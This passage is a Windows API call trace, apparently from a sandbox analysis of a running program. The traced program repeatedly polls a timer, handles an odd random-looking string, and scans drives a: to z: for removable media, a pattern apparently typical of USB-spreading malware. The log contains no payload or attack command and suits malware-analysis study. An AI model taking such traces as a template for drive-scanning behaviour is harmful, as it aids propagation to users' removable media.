nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0222.492] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0222.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0222.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0222.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0222.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0222.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0222.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0222.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0222.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0222.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0222.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0222.493] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0222.493] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0222.493] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0222.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0222.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0222.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0222.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0222.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0222.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0222.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0222.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0222.494] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0222.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0222.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0222.494] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0222.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0222.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0222.494] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0222.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0222.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0222.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0222.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0222.494] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0222.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0222.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0222.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0222.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0222.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0222.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0222.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0222.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0222.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0222.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0222.495] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0222.495] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0222.495] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0222.495] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0222.495] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0222.495] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0222.496] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0222.496] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0222.496] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0222.496] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0222.496] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0222.497] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0222.497] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0222.497] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0222.497] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0222.498] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0222.498] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0222.498] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0222.499] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0222.499] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0222.499] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0222.500] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0222.500] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0222.500] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0222.501] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0222.501] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0222.501] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0222.515] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0222.516] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0222.516] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0222.516] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0222.516] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0222.516] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0222.516] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0222.516] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0222.516] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0222.516] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0222.516] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0222.516] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0222.516] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0222.516] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0222.516] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0222.516] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0222.517] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0222.517] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0222.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0222.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0222.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fe0 [0222.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0222.517] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0222.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0222.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0222.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fe0 | out: hHeap=0x12c0000) returned 1 [0222.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0222.517] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0222.517] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0222.517] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0222.518] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0222.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0222.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0222.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0222.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0222.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0222.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0222.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0222.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0222.518] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0222.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0222.518] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0222.518] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0222.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0222.518] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0222.518] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0222.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0222.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0222.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0222.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0222.519] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0222.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0222.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0222.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0222.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0222.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0222.519] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0222.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0222.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0222.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0222.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0222.519] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0222.519] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0222.520] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0222.520] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0222.520] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0222.520] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0224.175] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0224.175] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0224.176] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0224.176] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0224.176] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0224.176] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0224.177] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0224.177] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0224.177] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0224.177] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0224.177] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0224.178] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0224.178] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0224.178] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0224.178] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0224.178] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0224.179] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0224.179] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0224.179] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0224.179] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0224.179] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0224.179] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0224.180] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0224.180] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0224.180] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0224.180] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0224.180] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0224.180] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0224.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0224.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0224.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0224.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0224.180] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0224.180] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0224.180] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0224.181] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0224.181] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0224.181] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0224.181] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0224.181] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0224.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0224.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0224.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0224.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fc0 [0224.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0224.183] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0224.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0224.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0224.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fc0 | out: hHeap=0x12c0000) returned 1 [0224.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0224.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0224.183] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0224.184] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0224.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0224.184] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0224.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0224.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0224.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0224.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0224.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0224.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0224.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0224.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0224.184] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0224.184] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0224.184] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0224.185] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0224.185] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0224.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0224.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0224.185] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0224.185] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0224.185] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0224.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0224.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0224.185] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0224.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0224.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0224.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0224.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0224.185] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0224.186] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0224.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0224.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0224.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0224.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0224.186] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0224.186] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0224.186] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0224.186] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0224.187] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0224.187] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0224.187] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0224.187] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0224.187] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0224.188] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0224.188] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0224.188] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0224.190] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0224.190] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0224.190] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0224.190] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0224.191] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0224.191] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0224.191] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0224.191] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0224.191] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0224.192] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0224.192] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0224.192] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0224.192] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0224.192] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0224.193] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0224.193] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0224.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: 